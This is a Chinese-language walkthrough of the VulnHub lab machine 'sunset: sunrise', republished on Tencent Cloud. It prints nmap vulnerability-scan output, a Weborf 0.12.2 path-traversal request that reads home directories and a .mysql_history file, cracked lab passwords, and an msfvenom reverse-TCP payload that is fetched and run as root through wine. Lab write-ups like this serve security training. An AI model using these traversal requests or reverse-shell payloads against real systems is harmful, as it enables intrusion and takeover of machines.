Vulnhub靶机之sunsetsunrise
Vulnhub靶机之sunsetsunrise
少而不学,老而无识。
大家好啊,我是那个喜欢打靶机的lengyi,我又回来了。sunset: sunrise是vulnhub上面一个中等难度的靶机,具体介绍地址为:https://www.vulnhub.com/entry/sunset-sunrise,406/,
主要涉及的网络知识点有:
•资产发现•目录遍历•漏洞利用•Mysql利用•权限提升
好了不多说开始我们的渗透之旅吧。
前期踩点
首先使用nmap的sP参数进行主机发现,得到目标地址为192.168.0.103,当然你也可以使用netdiscover等进行主机发现。
然后访问该内网地址发现,只有一个静态页面,
且并无任何提示(有时源代码会有部分提示):
于是使用nmap进行简单扫描
nmap -A -sS -sV -Pn -T4 -p- --script=vuln 192.168.0.103╰─# nmap -A -sS -sV -Pn -T4 -p- --script=vuln 192.168.0.103 148 ↵
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-11 16:48 CST
Nmap scan report for 192.168.0.103
Host is up (0.00055s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /: Root directory w/ listing on 'apache/2.4.38 (debian)'
|_http-server-header: Apache/2.4.38 (Debian)
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.0.103:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=S%3bO%3dD%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=M%3bO%3dD%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=D%3bO%3dD%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=N%3bO%3dD%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=D%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=M%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=N%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=S%3bO%3dA%27%20OR%20sqlspider
| http://192.168.0.103:80/?C=D%3bO%3dA%27%20OR%20sqlspider
|_ http://192.168.0.103:80/?C=M%3bO%3dA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners:
| cpe:/a:apache:http_server:2.4.38:
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| CVE-2019-10082 6.4 https://vulners.com/cve/CVE-2019-10082
| CVE-2019-10097 6.0 https://vulners.com/cve/CVE-2019-10097
| CVE-2019-0217 6.0 https://vulners.com/cve/CVE-2019-0217
| CVE-2019-0215 6.0 https://vulners.com/cve/CVE-2019-0215
| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
| CVE-2019-10081 5.0 https://vulners.com/cve/CVE-2019-10081
| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
| CVE-2019-0196 5.0 https://vulners.com/cve/CVE-2019-0196
| CVE-2019-0197 4.9 https://vulners.com/cve/CVE-2019-0197
|_ CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
3306/tcp open mysql?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| DNSVersionBindReqTCP, NULL:
|_ Host '192.168.0.104' is not allowed to connect to this MariaDB server
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
8080/tcp open http-proxy Weborf (GNU/Linux)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Page not found: Weborf (GNU/Linux)
| Content-Length: 202
| Content-Type: text/html
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 404</H1>Page not found <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| GetRequest:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Content-Length: 326
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><tr style="background-color: #DFDFDF;"><td>d</td><td><a href="html/">html/</a></td><td>-</td></tr>
| </table><p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 200
| Server: Weborf (GNU/Linux)
| Allow: GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE
| DAV: 1,2
| DAV: <http://apache.org/dav/propset/fs/1>
| MS-Author-Via: DAV
| Socks5:
| HTTP/1.1 400 Bad request: Weborf (GNU/Linux)
| Content-Length: 199
| Content-Type: text/html
|_ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Weborf</title></head><body> <H1>Error 400</H1>Bad request <p>Generated by Weborf/0.12.2 (GNU/Linux)</p></body></html>
| http-enum:
| /../../../../../../../../../../etc/passwd: Possible path traversal in URI
| /../../../../../../../../../../boot.ini: Possible path traversal in URI
|_ /html/: Potentially interesting folder
|_http-server-header: Weborf (GNU/Linux)
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3306-TCP:V=7.80%I=7%D=1/11%Time=5E198BD9%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.0\.104'\x20is\x20not\x20all
SF:owed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSVersion
SF:BindReqTCP,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.0\.104'\x20is\x20no
SF:t\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8080-TCP:V=7.80%I=7%D=1/11%Time=5E198BDE%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,187,"HTTP/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU/Linux\)\r\
SF:nContent-Length:\x20326\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C/
SF:/DTD\x20HTML\x204\.01\x20Transitional//EN\"><html><head><title>Weborf</
SF:title></head><body><table><tr><td></td><td>Name</td><td>Size</td></tr><
SF:tr\x20style=\"background-color:\x20#DFDFDF;\"><td>d</td><td><a\x20href=
SF:\"html/\">html/</a></td><td>-</td></tr>\n</table><p>Generated\x20by\x20
SF:Weborf/0\.12\.2\x20\(GNU/Linux\)</p></body></html>")%r(HTTPOptions,B2,"
SF:HTTP/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU/Linux\)\r\nAllow:\x20GET
SF:,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE\r\nDAV:\x201,2\r\nDAV
SF::\x20<http://apache\.org/dav/propset/fs/1>\r\nMS-Author-Via:\x20DAV\r\n
SF:\r\n")%r(RTSPRequest,B2,"HTTP/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU
SF:/Linux\)\r\nAllow:\x20GET,POST,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,M
SF:OVE\r\nDAV:\x201,2\r\nDAV:\x20<http://apache\.org/dav/propset/fs/1>\r\n
SF:MS-Author-Via:\x20DAV\r\n\r\n")%r(FourOhFourRequest,12B,"HTTP/1\.1\x204
SF:04\x20Page\x20not\x20found:\x20Weborf\x20\(GNU/Linux\)\r\nContent-Lengt
SF:h:\x20202\r\nContent-Type:\x20text/html\r\n\r\n<!DOCTYPE\x20HTML\x20PUB
SF:LIC\x20\"-//W3C//DTD\x20HTML\x204\.01\x20Transitional//EN\"><html><head
SF:><title>Weborf</title></head><body>\x20<H1>Error\x20404</H1>Page\x20not
SF:\x20found\x20<p>Generated\x20by\x20Weborf/0\.12\.2\x20\(GNU/Linux\)</p>
SF:</body></html>")%r(Socks5,125,"HTTP/1\.1\x20400\x20Bad\x20request:\x20W
SF:eborf\x20\(GNU/Linux\)\r\nContent-Length:\x20199\r\nContent-Type:\x20te
SF:xt/html\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x20
SF:4\.01\x20Transitional//EN\"><html><head><title>Weborf</title></head><bo
SF:dy>\x20<H1>Error\x20400</H1>Bad\x20request\x20<p>Generated\x20by\x20Web
SF:orf/0\.12\.2\x20\(GNU/Linux\)</p></body></html>")%r(SIPOptions,B2,"HTTP
SF:/1\.1\x20200\r\nServer:\x20Weborf\x20\(GNU/Linux\)\r\nAllow:\x20GET,POS
SF:T,PUT,DELETE,OPTIONS,PROPFIND,MKCOL,COPY,MOVE\r\nDAV:\x201,2\r\nDAV:\x2
SF:0<http://apache\.org/dav/propset/fs/1>\r\nMS-Author-Via:\x20DAV\r\n\r\n
SF:");
MAC Address: B4:6B:FC:47:AD:60 (Intel Corporate)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.55 ms 192.168.0.103
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 199.07 seconds
通过nmap的扫描我们发现,目标开放了22、80、3306、8080端口,且8080端口运行着web服务,而且貌似可以进行文件读取,我们访问8080端口。
发现了:
Generated by Weborf/0.12.2 (GNU/Linux)通过搜索的到了关于该web服务器的基本信息(https://www.oschina.net/p/weborf) ,但是nmap并没有给出具体的payload,于是我们使用kali自带的 searchsploit 进行搜索该服务器的漏洞:
searchsploit Weborf 0.12.2
查看exp:
cat /usr/share/exploitdb/exploits/linux/remote/14925.txt
成功读取,其实nmap给出的也是可以的,只是我忘记了url编码...
根据靶机的名称,sunset-sunrise,我们可以尝试分别去读home下的这两个文件夹,结果sunrise下有东西。
http://192.168.0.103:8080//..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2f
接下来就好说了,读user.txt里面肯定有东西。,果不齐然,得到了一串密文a6050aecf6303b0b824038807d823a89,解密了一下发现无法解密,后来去问了作者,作者说这是其中之一的flag。好吧,继续往下...
通过刚才的方法,我们发现home目录下还有一个weborf目录,手工层层访问太慢了,于是使用目录扫描工具对其进行爆破。这里说一下,我使用了dirsearch等都没办法对这类的url进行扫描,但是都失败,但是dirb可以
发现mysql敏感目录,访问之
http://192.168.0.103:8080//..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f/.mysql_history
获得shell
得到一个用户名和密码,使用ssh成功连接。
weborf
iheartrainbows44
权限提升
因为当时mysql历史里面发现的这个账户,我们进入mysql看能不能找到root的密码:
将root的hash值解密得到purplerain54732,直接root用户登录便可以提权
当密码解密不出时,我们也可以使用另一种方式进行提权,因为里面还有一个sunrise的用户,我们尝试登录该用户
这里给我们一个提示,也就是该用户可以用root权限运行wine,wine就不用多说了吧,linux运行windows的东西,我们思路就来了,生成一个exe文件,root权限运行wine来运行该exe获取root权限。
使用下面的命令生产exe文件
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=ip LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o /var/www/html/winbin.exe然后随便使用python或者apache开启一个web服务,再使用靶机下载我们的木马并执行。
得到root权限,然后在/root下发现root.txt得到flag
用的安全客的图床,双重水印了,可怕....
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-01-14,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
相关产品与服务
云数据库 SQL Server
腾讯云数据库 SQL Server (TencentDB for SQL Server)是业界最常用的商用数据库之一,对基于 Windows 架构的应用程序具有完美的支持。TencentDB for SQL Server 拥有微软正版授权,可持续为用户提供最新的功能,避免未授权使用软件的风险。具有即开即用、稳定可靠、安全运行、弹性扩缩等特点。